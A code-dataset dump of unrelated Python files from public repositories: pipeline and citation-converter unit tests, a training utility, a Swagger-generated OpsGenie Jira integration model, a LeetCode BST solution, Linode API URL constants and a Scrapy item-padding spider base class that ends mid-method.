2dd1609af2025fa93e9fc6653d6d33aeb97f9b19 | 493431b109586bc199c0094bb6952b359c30777a | /t/step/test_header_step.py | 22289673b733113ef07729325bf5baffc937a5ad | [] | no_license | phonybone/Rnaseq | 3ec92ba79c6772ffb5ac146ee98dad87663f17e7 | c12d5380db2e36f24b6e5cb84c55a984efdd9cd7 | refs/heads/master | 2020-05-31T21:19:40.175543 | 2011-10-06T00:01:49 | 2011-10-06T00:01:49 | 1,409,030 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | import unittest, os, sys, re
dir=os.path.normpath(os.path.dirname(os.path.abspath(__file__))+"/../..")
sys.path.append(os.path.join(dir+'/lib'))
sys.path.append(os.path.join(dir+'/ext_libs'))
from Rnaseq import *
from RnaseqGlobals import *
from warn import *
class TestHeaderStep(unittest.TestCase):
def setUp(self):
argv=RnaseqGlobals.initialize(__file__, testing=True) # not to be confused with sys.argv
readset_file=RnaseqGlobals.root_dir()+'/t/fixtures/readsets/readset1.syml'
rlist=Readset.load(readset_file)
self.readset=rlist[0]
self.pipeline=Pipeline.get_pipeline(name='link', readset=self.readset).load_steps()
def test_setup(self):
self.assertEqual(self.readset.name, 'readset1.syml')
self.assertEqual(self.pipeline.name, 'link')
self.assertTrue(self.pipeline.context != None)
#def test_header_script(self):
#header_step=self.pipeline.step_with_name('header')
def test_readset_exports(self):
header_step=self.pipeline.step_with_name('header')
script=header_step.sh_script(self.pipeline.context)
for ex in self.readset.exports:
target='export %s=%s' % (ex, getattr(self.readset, ex))
self.assertRegexpMatches(script, target)
#print >>sys.stderr, "got %s" % target
def test_links(self):
header_step=self.pipeline.step_with_name('header')
script=header_step.sh_script(self.pipeline.context)
for rf in self.readset.reads_files:
target='ln -fs %s %s' % (rf, self.readset.working_dir)
self.assertRegexpMatches(script, target)
#print >>sys.stderr, "got %s" % target
suite = unittest.TestLoader().loadTestsFromTestCase(TestHeaderStep)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"vcassen@bento.systemsbiology.net"
] | vcassen@bento.systemsbiology.net |
d2239c158fa3aa78bbd5bf3e8a5cb23e8b68c2fc | bfe394e1b7d8a2ff34e37ae65df8cc52070c69d8 | /Source/External/TrainUtility/Source/TrainProcess_FileControl.py | 421e6bb0c5f2eb8f3175960b7bb6fcbe8f89070f | [
"MIT"
] | permissive | Jack-GVDL/PredictModel | bb32d37a5c18a656d5ebed36098ba3fac435fb96 | 20495072fb776c31c4bb5f2ddeecda1b43fcc52e | refs/heads/main | 2023-04-30T05:47:34.364328 | 2021-05-11T09:25:13 | 2021-05-11T09:25:13 | 366,314,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,936 | py | import os
from typing import *
from .TrainProcess import TrainProcess
from .ModelInfo import ModelInfo
from .FileControl import FileControl_Local
class TrainProcess_FileControlBuilder(TrainProcess):
def __init__(self):
super().__init__()
# data
self.name = "FileControlBuilder"
self.path_base: str = "" # this should exist
self.path_folder: str = "" # this should not exist
self.path_src: str = ""
# operation
# ...
def __del__(self):
return
# Operation
def setTargetPath(self, base: str, folder: str) -> None:
self.path_base = base
self.path_folder = folder
# operation
def execute(self, stage: int, info: ModelInfo, data: Dict) -> None:
# create the base directory
self.path_src = os.path.join(self.path_base, self.path_folder)
if not os.path.isdir(self.path_src):
os.mkdir(self.path_src)
# create file control
control = FileControl_Local()
control.setLocalRoot(self.path_src)
control.start()
info.file_control = control
# info
def getPrintContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
def getLogContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
# Protected
def _getContent_(self, info: ModelInfo) -> str:
return "Operation: " + self.name
class TrainProcess_FileControlUpdater(TrainProcess):
def __init__(self):
super().__init__()
# data
self.name = "FileControlUpdater"
# operation
# ...
def __del__(self):
return
# Property
# operation
def execute(self, stage: int, info: ModelInfo, data: Dict) -> None:
info.file_control.update()
# Operation
# ...
# Protected
def getPrintContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
def getLogContent(self, stage: int, info: ModelInfo) -> str:
return self._getContent_(info)
# Protected
def _getContent_(self, info: ModelInfo) -> str:
return "Operation: " + self.name
| [
"33114105+Jack-GVDL@users.noreply.github.com"
] | 33114105+Jack-GVDL@users.noreply.github.com |
08b3a3fbc165a4633691df1cd0579378c3fa8569 | a62fe37f8d633cbeb75d8cf2487f24e2bb0c13ce | /test/1.1.0/08/EndnoteObjectTest08.py | 73e2862f293a89600750726f5cfc582610fa3a47 | [
"Apache-2.0"
] | permissive | monperrus/cff-converter-python | ddf4e28329c48b0d3db4709de8765dfbfc94ad0b | b7b789a80415c6020e864782b601f21188a149f4 | refs/heads/master | 2020-11-27T10:40:11.447633 | 2019-12-19T15:58:01 | 2019-12-19T15:58:01 | 229,408,045 | 0 | 0 | Apache-2.0 | 2019-12-21T09:54:20 | 2019-12-21T09:54:19 | null | UTF-8 | Python | false | false | 1,468 | py | from cffconvert import EndnoteObject
import unittest
import os
import ruamel.yaml as yaml
class EndnoteObjectTest(unittest.TestCase):
def setUp(self):
fixture = os.path.join(os.path.dirname(__file__), "CITATION.cff")
with open(fixture, "r") as f:
cffstr = f.read()
cff_object = yaml.safe_load(cffstr)
self.eo = EndnoteObject(cff_object, initialize_empty=True)
def test_check_cff_object(self):
self.eo.check_cff_object()
# doesn't need an assert
def test_author(self):
self.eo.add_author()
self.assertEqual(self.eo.author, '%A Van Zandt, Steven\n%A van Zandt, Steven\n')
def test_doi(self):
self.eo.add_doi()
self.assertIsNone(self.eo.doi)
def test_keyword(self):
self.eo.add_keyword()
self.assertIsNone(self.eo.keyword)
def test_name(self):
self.eo.add_name()
self.assertEqual(self.eo.name, '%T cff-converter-python\n')
def test_print(self):
actual_endnote = self.eo.add_all().print()
fixture = os.path.join(os.path.dirname(__file__), "endnote.enw")
with open(fixture, "r") as f:
expected_endnote = f.read()
self.assertEqual(actual_endnote, expected_endnote)
def test_url(self):
self.eo.add_url()
self.assertIsNone(self.eo.url)
def test_year(self):
self.eo.add_year()
self.assertEqual(self.eo.year, '%D 2018\n')
| [
"j.spaaks@esciencecenter.nl"
] | j.spaaks@esciencecenter.nl |
e4be9d7b105b0171b203f3ab0a681d4997565d9d | c104dbd09a853725cb4f4b17df7c5dd59d47e04e | /opsgenie_swagger/models/jira_integration.py | 185f6418b77a71dfbe695e25f05cecc5a04a542c | [
"Apache-2.0"
] | permissive | bm-lab/opsgenie-python-sdk | 5a64e2c24f1b9168ecadf482ba8084ba27a659fc | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | refs/heads/master | 2021-10-09T03:18:48.101672 | 2018-12-15T01:03:36 | 2018-12-20T15:13:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,355 | py | # coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from opsgenie_swagger.models.action_mapping import ActionMapping # noqa: F401,E501
from opsgenie_swagger.models.alert_filter import AlertFilter # noqa: F401,E501
from opsgenie_swagger.models.integration import Integration # noqa: F401,E501
from opsgenie_swagger.models.jira_callback import JiraCallback # noqa: F401,E501
from opsgenie_swagger.models.recipient import Recipient # noqa: F401,E501
from opsgenie_swagger.models.team_meta import TeamMeta # noqa: F401,E501
from opsgenie_swagger.models.token_based_incoming_feature import TokenBasedIncomingFeature # noqa: F401,E501
class JiraIntegration(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'suppress_notifications': 'bool',
'ignore_teams_from_payload': 'bool',
'ignore_recipients_from_payload': 'bool',
'recipients': 'list[Recipient]',
'is_advanced': 'bool',
'feature_type': 'str',
'allow_configuration_access': 'bool',
'allow_write_access': 'bool',
'alert_filter': 'AlertFilter',
'forwarding_enabled': 'bool',
'forwarding_action_mappings': 'list[ActionMapping]',
'callback_type': 'str',
'updates_action_mappings': 'list[ActionMapping]',
'updates_enabled': 'bool',
'bidirectional_callback_type': 'str',
'jira_username': 'str',
'jira_password': 'str',
'jira_url': 'str',
'project_key': 'str',
'issue_type_name': 'str'
}
attribute_map = {
'suppress_notifications': 'suppressNotifications',
'ignore_teams_from_payload': 'ignoreTeamsFromPayload',
'ignore_recipients_from_payload': 'ignoreRecipientsFromPayload',
'recipients': 'recipients',
'is_advanced': 'isAdvanced',
'feature_type': 'feature-type',
'allow_configuration_access': 'allowConfigurationAccess',
'allow_write_access': 'allowWriteAccess',
'alert_filter': 'alertFilter',
'forwarding_enabled': 'forwardingEnabled',
'forwarding_action_mappings': 'forwardingActionMappings',
'callback_type': 'callback-type',
'updates_action_mappings': 'updatesActionMappings',
'updates_enabled': 'updatesEnabled',
'bidirectional_callback_type': 'bidirectional-callback-type',
'jira_username': 'jiraUsername',
'jira_password': 'jiraPassword',
'jira_url': 'jiraUrl',
'project_key': 'projectKey',
'issue_type_name': 'issueTypeName'
}
def __init__(self, suppress_notifications=None, ignore_teams_from_payload=None, ignore_recipients_from_payload=None, recipients=None, is_advanced=None, feature_type=None, allow_configuration_access=None, allow_write_access=None, alert_filter=None, forwarding_enabled=None, forwarding_action_mappings=None, callback_type=None, updates_action_mappings=None, updates_enabled=None, bidirectional_callback_type=None, jira_username=None, jira_password=None, jira_url=None, project_key=None, issue_type_name=None): # noqa: E501
"""JiraIntegration - a model defined in Swagger""" # noqa: E501
self._suppress_notifications = None
self._ignore_teams_from_payload = None
self._ignore_recipients_from_payload = None
self._recipients = None
self._is_advanced = None
self._feature_type = None
self._allow_configuration_access = None
self._allow_write_access = None
self._alert_filter = None
self._forwarding_enabled = None
self._forwarding_action_mappings = None
self._callback_type = None
self._updates_action_mappings = None
self._updates_enabled = None
self._bidirectional_callback_type = None
self._jira_username = None
self._jira_password = None
self._jira_url = None
self._project_key = None
self._issue_type_name = None
self.discriminator = None
if suppress_notifications is not None:
self.suppress_notifications = suppress_notifications
if ignore_teams_from_payload is not None:
self.ignore_teams_from_payload = ignore_teams_from_payload
if ignore_recipients_from_payload is not None:
self.ignore_recipients_from_payload = ignore_recipients_from_payload
if recipients is not None:
self.recipients = recipients
if is_advanced is not None:
self.is_advanced = is_advanced
if feature_type is not None:
self.feature_type = feature_type
if allow_configuration_access is not None:
self.allow_configuration_access = allow_configuration_access
if allow_write_access is not None:
self.allow_write_access = allow_write_access
if alert_filter is not None:
self.alert_filter = alert_filter
if forwarding_enabled is not None:
self.forwarding_enabled = forwarding_enabled
if forwarding_action_mappings is not None:
self.forwarding_action_mappings = forwarding_action_mappings
if callback_type is not None:
self.callback_type = callback_type
if updates_action_mappings is not None:
self.updates_action_mappings = updates_action_mappings
if updates_enabled is not None:
self.updates_enabled = updates_enabled
if bidirectional_callback_type is not None:
self.bidirectional_callback_type = bidirectional_callback_type
if jira_username is not None:
self.jira_username = jira_username
if jira_password is not None:
self.jira_password = jira_password
if jira_url is not None:
self.jira_url = jira_url
if project_key is not None:
self.project_key = project_key
if issue_type_name is not None:
self.issue_type_name = issue_type_name
@property
def suppress_notifications(self):
"""Gets the suppress_notifications of this JiraIntegration. # noqa: E501
If enabled, notifications that come from alerts will be suppressed. Defaults to false # noqa: E501
:return: The suppress_notifications of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._suppress_notifications
@suppress_notifications.setter
def suppress_notifications(self, suppress_notifications):
"""Sets the suppress_notifications of this JiraIntegration.
If enabled, notifications that come from alerts will be suppressed. Defaults to false # noqa: E501
:param suppress_notifications: The suppress_notifications of this JiraIntegration. # noqa: E501
:type: bool
"""
self._suppress_notifications = suppress_notifications
@property
def ignore_teams_from_payload(self):
"""Gets the ignore_teams_from_payload of this JiraIntegration. # noqa: E501
If enabled, the integration will ignore teams sent in request payloads. Defaults to false # noqa: E501
:return: The ignore_teams_from_payload of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._ignore_teams_from_payload
@ignore_teams_from_payload.setter
def ignore_teams_from_payload(self, ignore_teams_from_payload):
"""Sets the ignore_teams_from_payload of this JiraIntegration.
If enabled, the integration will ignore teams sent in request payloads. Defaults to false # noqa: E501
:param ignore_teams_from_payload: The ignore_teams_from_payload of this JiraIntegration. # noqa: E501
:type: bool
"""
self._ignore_teams_from_payload = ignore_teams_from_payload
@property
def ignore_recipients_from_payload(self):
"""Gets the ignore_recipients_from_payload of this JiraIntegration. # noqa: E501
If enabled, the integration will ignore recipients sent in request payloads. Defaults to false # noqa: E501
:return: The ignore_recipients_from_payload of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._ignore_recipients_from_payload
@ignore_recipients_from_payload.setter
def ignore_recipients_from_payload(self, ignore_recipients_from_payload):
"""Sets the ignore_recipients_from_payload of this JiraIntegration.
If enabled, the integration will ignore recipients sent in request payloads. Defaults to false # noqa: E501
:param ignore_recipients_from_payload: The ignore_recipients_from_payload of this JiraIntegration. # noqa: E501
:type: bool
"""
self._ignore_recipients_from_payload = ignore_recipients_from_payload
@property
def recipients(self):
"""Gets the recipients of this JiraIntegration. # noqa: E501
Optional user, schedule, teams or escalation names to calculate which users will receive the notifications of the alert. Recipients which are exceeding the limit are ignored # noqa: E501
:return: The recipients of this JiraIntegration. # noqa: E501
:rtype: list[Recipient]
"""
return self._recipients
@recipients.setter
def recipients(self, recipients):
"""Sets the recipients of this JiraIntegration.
Optional user, schedule, teams or escalation names to calculate which users will receive the notifications of the alert. Recipients which are exceeding the limit are ignored # noqa: E501
:param recipients: The recipients of this JiraIntegration. # noqa: E501
:type: list[Recipient]
"""
self._recipients = recipients
@property
def is_advanced(self):
"""Gets the is_advanced of this JiraIntegration. # noqa: E501
:return: The is_advanced of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._is_advanced
@is_advanced.setter
def is_advanced(self, is_advanced):
"""Sets the is_advanced of this JiraIntegration.
:param is_advanced: The is_advanced of this JiraIntegration. # noqa: E501
:type: bool
"""
self._is_advanced = is_advanced
@property
def feature_type(self):
"""Gets the feature_type of this JiraIntegration. # noqa: E501
:return: The feature_type of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._feature_type
@feature_type.setter
def feature_type(self, feature_type):
"""Sets the feature_type of this JiraIntegration.
:param feature_type: The feature_type of this JiraIntegration. # noqa: E501
:type: str
"""
allowed_values = ["email-based", "token-based"] # noqa: E501
if feature_type not in allowed_values:
raise ValueError(
"Invalid value for `feature_type` ({0}), must be one of {1}" # noqa: E501
.format(feature_type, allowed_values)
)
self._feature_type = feature_type
@property
def allow_configuration_access(self):
"""Gets the allow_configuration_access of this JiraIntegration. # noqa: E501
This parameter is for allowing or restricting the configuration access. If configuration access is restricted, the integration will be limited to Alert API requests and sending heartbeats. Defaults to false # noqa: E501
:return: The allow_configuration_access of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._allow_configuration_access
@allow_configuration_access.setter
def allow_configuration_access(self, allow_configuration_access):
"""Sets the allow_configuration_access of this JiraIntegration.
This parameter is for allowing or restricting the configuration access. If configuration access is restricted, the integration will be limited to Alert API requests and sending heartbeats. Defaults to false # noqa: E501
:param allow_configuration_access: The allow_configuration_access of this JiraIntegration. # noqa: E501
:type: bool
"""
self._allow_configuration_access = allow_configuration_access
@property
def allow_write_access(self):
"""Gets the allow_write_access of this JiraIntegration. # noqa: E501
This parameter is for configuring the read-only access of integration. If the integration is limited to read-only access, the integration will not be authorized to perform any create, update or delete action within any domain. Defaults to true # noqa: E501
:return: The allow_write_access of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._allow_write_access
@allow_write_access.setter
def allow_write_access(self, allow_write_access):
"""Sets the allow_write_access of this JiraIntegration.
This parameter is for configuring the read-only access of integration. If the integration is limited to read-only access, the integration will not be authorized to perform any create, update or delete action within any domain. Defaults to true # noqa: E501
:param allow_write_access: The allow_write_access of this JiraIntegration. # noqa: E501
:type: bool
"""
self._allow_write_access = allow_write_access
@property
def alert_filter(self):
"""Gets the alert_filter of this JiraIntegration. # noqa: E501
:return: The alert_filter of this JiraIntegration. # noqa: E501
:rtype: AlertFilter
"""
return self._alert_filter
@alert_filter.setter
def alert_filter(self, alert_filter):
"""Sets the alert_filter of this JiraIntegration.
:param alert_filter: The alert_filter of this JiraIntegration. # noqa: E501
:type: AlertFilter
"""
self._alert_filter = alert_filter
@property
def forwarding_enabled(self):
"""Gets the forwarding_enabled of this JiraIntegration. # noqa: E501
:return: The forwarding_enabled of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._forwarding_enabled
@forwarding_enabled.setter
def forwarding_enabled(self, forwarding_enabled):
"""Sets the forwarding_enabled of this JiraIntegration.
:param forwarding_enabled: The forwarding_enabled of this JiraIntegration. # noqa: E501
:type: bool
"""
self._forwarding_enabled = forwarding_enabled
@property
def forwarding_action_mappings(self):
"""Gets the forwarding_action_mappings of this JiraIntegration. # noqa: E501
:return: The forwarding_action_mappings of this JiraIntegration. # noqa: E501
:rtype: list[ActionMapping]
"""
return self._forwarding_action_mappings
@forwarding_action_mappings.setter
def forwarding_action_mappings(self, forwarding_action_mappings):
"""Sets the forwarding_action_mappings of this JiraIntegration.
:param forwarding_action_mappings: The forwarding_action_mappings of this JiraIntegration. # noqa: E501
:type: list[ActionMapping]
"""
self._forwarding_action_mappings = forwarding_action_mappings
@property
def callback_type(self):
"""Gets the callback_type of this JiraIntegration. # noqa: E501
:return: The callback_type of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._callback_type
@callback_type.setter
def callback_type(self, callback_type):
"""Sets the callback_type of this JiraIntegration.
:param callback_type: The callback_type of this JiraIntegration. # noqa: E501
:type: str
"""
allowed_values = ["bidirectional-callback-new", "amazon-sns-callback"] # noqa: E501
if callback_type not in allowed_values:
raise ValueError(
"Invalid value for `callback_type` ({0}), must be one of {1}" # noqa: E501
.format(callback_type, allowed_values)
)
self._callback_type = callback_type
@property
def updates_action_mappings(self):
"""Gets the updates_action_mappings of this JiraIntegration. # noqa: E501
:return: The updates_action_mappings of this JiraIntegration. # noqa: E501
:rtype: list[ActionMapping]
"""
return self._updates_action_mappings
@updates_action_mappings.setter
def updates_action_mappings(self, updates_action_mappings):
"""Sets the updates_action_mappings of this JiraIntegration.
:param updates_action_mappings: The updates_action_mappings of this JiraIntegration. # noqa: E501
:type: list[ActionMapping]
"""
self._updates_action_mappings = updates_action_mappings
@property
def updates_enabled(self):
"""Gets the updates_enabled of this JiraIntegration. # noqa: E501
:return: The updates_enabled of this JiraIntegration. # noqa: E501
:rtype: bool
"""
return self._updates_enabled
@updates_enabled.setter
def updates_enabled(self, updates_enabled):
"""Sets the updates_enabled of this JiraIntegration.
:param updates_enabled: The updates_enabled of this JiraIntegration. # noqa: E501
:type: bool
"""
self._updates_enabled = updates_enabled
@property
def bidirectional_callback_type(self):
"""Gets the bidirectional_callback_type of this JiraIntegration. # noqa: E501
:return: The bidirectional_callback_type of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._bidirectional_callback_type
@bidirectional_callback_type.setter
def bidirectional_callback_type(self, bidirectional_callback_type):
"""Sets the bidirectional_callback_type of this JiraIntegration.
:param bidirectional_callback_type: The bidirectional_callback_type of this JiraIntegration. # noqa: E501
:type: str
"""
allowed_values = ["opsgenie-callback", "jira-callback", "jira-service-desk-callback", "service-now-callback", "kayako-callback", "ms-teams-callback", "op5-callback", "status-page-io-callback", "zendesk-callback"] # noqa: E501
if bidirectional_callback_type not in allowed_values:
raise ValueError(
"Invalid value for `bidirectional_callback_type` ({0}), must be one of {1}" # noqa: E501
.format(bidirectional_callback_type, allowed_values)
)
self._bidirectional_callback_type = bidirectional_callback_type
@property
def jira_username(self):
"""Gets the jira_username of this JiraIntegration. # noqa: E501
:return: The jira_username of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._jira_username
@jira_username.setter
def jira_username(self, jira_username):
"""Sets the jira_username of this JiraIntegration.
:param jira_username: The jira_username of this JiraIntegration. # noqa: E501
:type: str
"""
self._jira_username = jira_username
@property
def jira_password(self):
"""Gets the jira_password of this JiraIntegration. # noqa: E501
:return: The jira_password of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._jira_password
@jira_password.setter
def jira_password(self, jira_password):
"""Sets the jira_password of this JiraIntegration.
:param jira_password: The jira_password of this JiraIntegration. # noqa: E501
:type: str
"""
self._jira_password = jira_password
@property
def jira_url(self):
"""Gets the jira_url of this JiraIntegration. # noqa: E501
:return: The jira_url of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._jira_url
@jira_url.setter
def jira_url(self, jira_url):
"""Sets the jira_url of this JiraIntegration.
:param jira_url: The jira_url of this JiraIntegration. # noqa: E501
:type: str
"""
self._jira_url = jira_url
@property
def project_key(self):
"""Gets the project_key of this JiraIntegration. # noqa: E501
:return: The project_key of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._project_key
@project_key.setter
def project_key(self, project_key):
"""Sets the project_key of this JiraIntegration.
:param project_key: The project_key of this JiraIntegration. # noqa: E501
:type: str
"""
self._project_key = project_key
@property
def issue_type_name(self):
"""Gets the issue_type_name of this JiraIntegration. # noqa: E501
:return: The issue_type_name of this JiraIntegration. # noqa: E501
:rtype: str
"""
return self._issue_type_name
@issue_type_name.setter
def issue_type_name(self, issue_type_name):
"""Sets the issue_type_name of this JiraIntegration.
:param issue_type_name: The issue_type_name of this JiraIntegration. # noqa: E501
:type: str
"""
self._issue_type_name = issue_type_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, JiraIntegration):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"c.chary@criteo.com"
] | c.chary@criteo.com |
b30391250e931a835456f54fed3840720a37cb94 | ba0a2b0d2d1534443ea34320675aadfa378457b6 | /Tree/Q776_Split BST.py | cec5e5a356eff9e2668e7a6734676b4d15d9afdc | [] | no_license | Luolingwei/LeetCode | 73abd58af116f3ec59fd6c76f662beb2a413586c | 79d4824879d0faed117eee9d99615cd478432a14 | refs/heads/master | 2021-08-08T17:45:19.215454 | 2021-06-17T17:03:15 | 2021-06-17T17:03:15 | 152,186,910 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 705 | py |
# 思路: 分成大于和小于等于v的两部分, 并且保持结构, recursive解决
# 如果v大于等于root.val, 那么左边和root都是小于等于v, split右边, 把low的部分放到root.right, 返回root和high
# 如果v小于root.val, 那么右边和root都是大于v, split左边, 把high的部分放到root.left, 返回low和root
class Solution:
def splitBST(self, root, V: int):
if not root:
return None,None
if root.val<=V:
low,high = self.splitBST(root.right,V)
root.right = low
return root,high
else:
low,high = self.splitBST(root.left,V)
root.left = high
return low,root | [
"564258080@qq.com"
] | 564258080@qq.com |
289900379592aeb4d1dacc726059621149bf2852 | c1d5c1285793660982813fd49dfb48620bc95b36 | /linode/commands/urls.py | d058c2eaa689673fe8a916325b5892033662ece2 | [
"MIT"
] | permissive | anvetsu/pylinode | 8e74330a8ae5f789cd9c4512efdc9f20aada61b9 | 3b15a153fa0528df203c0013949827ff836759f5 | refs/heads/master | 2020-04-06T14:05:39.106008 | 2018-11-14T10:06:43 | 2018-11-14T10:06:43 | 157,527,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | # -*- coding: utf-8 -*-
# Linode api urls
LINODE_CREATE = '&api_action=linode.create'
LINODE_CLONE = '&api_action=linode.clone'
LINODE_BOOT = '&api_action=linode.boot'
LINODE_LIST = '&api_action=linode.list'
LINODE_DISK_CREATE = '&api_action=linode.disk.create'
LINODE_DISK_FROM_IMAGE = '&api_action=linode.disk.createfromimage'
LINODE_IP = '&api_action=linode.ip.list'
AVAIL_DATACENTER = '&api_action=avail.datacenters'
AVAIL_DISTRIBUTION = '&api_action=avail.distributions'
AVAIL_PLANS = '&api_action=avail.linodeplans'
JOB_LIST = '&api_action=linode.job.list'
LINODE_CREATE_CONFIG = '&api_action=linode.config.create'
LINODE_UPDATE_CONFIG='&api_action=linode.config.update'
LINODE_GET_CONFIG='&api_action=linode.config.list'
LINODE_UPDATE='&api_action=linode.update'
AVAIL_IMAGE = '&api_action=image.list'
DELETE_LINODE = '&api_action=linode.delete'
| [
"anandpillai@letterboxes.org"
] | anandpillai@letterboxes.org |
c078b540b83093a2a0ddc11c89fb99872a7affe4 | 8db5b1d27f27d6440e6bfaebf661678f8ce016e3 | /strings/demo_string_octal.py | 8b23bdf068b3489345595bff360f3702607f5f5f | [] | no_license | rasul-sharifzade/LearnPython | 9f9f860550667117354354f4f7fee082da16dc7e | ac68c208d50a1e11cfd0ab52ae00d6baea596ce9 | refs/heads/master | 2020-12-27T06:42:38.603190 | 2020-06-28T09:01:19 | 2020-06-28T09:01:19 | 237,800,042 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | txt = "\110\145\154\154\157"
print(txt) | [
"rasul.sharifzade@gmail.com"
] | rasul.sharifzade@gmail.com |
0c172bfb2db2013120d8d28c36187938f0d125b1 | afbae53ad471e34eb9918f28cc2e27e1ade6fe93 | /vivo_public_modules/spiders/item_padding_spider.py | 4a418287c83ef08a9839f1c20550b6cb9809452d | [] | no_license | wangsanshi123/spiders | 5436431feec8d9591b1b533c7c6da261142403bd | 1b42878b694fabc65a02228662ffdf819e5dcc71 | refs/heads/master | 2020-03-19T13:49:31.161232 | 2018-06-08T09:24:10 | 2018-06-08T09:24:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,472 | py | # -*- coding: utf-8 -*-
'''
作者: 郑阔
日期: 2018.04.17
版本: 1.0
出于数据库的要求需要,我们每条记录都需要填充或者计算一些字段
需要填充的有: website_id, website_type, crawl_time等
需要计算的有: model_id, user_id, content_id, refer_id等
由于这是所有爬虫都会涉及的操作,我这里写一个爬虫基类完成完成这个操作
'''
import hashlib
import datetime
import inspect
from scrapy import Item
from scrapy import Spider
class ItemPaddingSpider(Spider):
'''
完成 item 填充的 spider 基类,重点在于统一的写到这里
避免每个项目成员自己写一套
'''
def __init__(self, name=None, **kwargs):
'''
生成 *_id 字段的计算需要哪些域的支持,在初始化中明确
:param self: 类的对象自身
:param name: scrapy 会将 name 属性传递进来
:param kwargs: 字典形式的参数,用于更新 self.__dict__
:return None
'''
super(ItemPaddingSpider, self).__init__(name, **kwargs)
self.id_field_list = dict()
# 列表当中元素的顺序非常重要,不同的顺序会形成不同的字符串,导致无法作为去重的依据
# model_id 依赖当中 website_id, model_name 为必填项, 假如不足以区分两款机型
# 则需要 提供 ram, rom 字段, 不需要 ram, rom 的 item 不包含 ram, rom 字段
# 或者将 ram, rom 字段置为 '' 空字符串即可.
self.id_field_list['model_id'] = ['website_id', 'model_name', 'ram', 'rom']
# user_id 依赖当中 website_id, user_name 为必填项, 假如不足以区分两款机型
self.id_field_list['user_id'] = ['website_id', 'user_name']
# content_id 依赖当中 website_id, main_body为必填项, user_name, date, time 需要看采集的网站是否支持
# 假如提供了时间信息,则 date, time 二选一, 类型分别为 datetime.datetime 和 datetime.date
self.id_field_list['content_id'] = ['website_id', 'main_body', 'user_name', 'date', 'time']
# website_id, website_type 需要子类去完善
self.website_id = None
self.website_type = None
def padding_item(self, item, refer_id):
'''
完成字段填充工作,避免每个人都要在自己的爬虫当中去设置
:param self: 对象自身
:param item: 待填充的 item, 可以是 dict 的子类, 也可以是 scrapy.Item的子类
能够直接通过赋值添加字段, scrapy.Item 则需要先添加相应的 Field 不能作为参数传进来
:param refer_id: refer_id 本身和当前 item 并无关系,它代表当前 item 所依赖的内容
:return: 填充完整的 item
:raise: AttributeError 来表达 website_type, website_id, user_name 等必要字段的缺失
'''
# scrapy.Item 的实例创建新的字段实在是太麻烦
# 检测到 item 是 Item 子类就将 item 转化为 dict 对象
if Item in inspect.getmro(item.__class__):
item = {field: item[field] for field in item}
if not self.website_id or not self.website_type:
raise AttributeError('Error: spider object do not have necessary attributes.')
# 所有记录都需要填写的字段
item['refer_id'] = refer_id
item['crawl_time'] = datetime.datetime.now()
item['website_type'] = self.website_type
item['website_id'] = self.website_id
# 检测 item 是否包含 一些必备的字段
# item 满足最低条件: 三者当中有一个字段认为至少能够插入一条信息
# 因为 model info 最初录入的时候可能并不存在 content, user
# 因为 user info 最初录入的时候可能并不存在 content, model
# 因为 content info 最初录入的时候可能并不存在 user, model
# 所以 数据是否有效并不是很好检测,需要成员提高警惕,避免数据漏传
meet_id_condition = False
for field in item:
if field in ['main_body', 'user_name', 'model_name']:
meet_id_condition = True
break
# 假如 item 并不包含上述 三个必备字段,则没有存储入库的必要
# 这时打印错误,并将 None 返回
if not meet_id_condition:
raise AttributeError('Error: item does not have necessary field of database.')
for id_field in self.id_field_list:
# 生成 model_id, user_id, content_id
valid_field_num = 0
id_component = ''
for field in self.id_field_list[id_field]:
if field in item:
valid_field_num += 1
id_component += str(item[field])
# website_id + model_name
# website_id + user_name
# website_id + main_body
# 至少两个有效字段的 hash 值才能作为 *_id 字段值
if valid_field_num > 1:
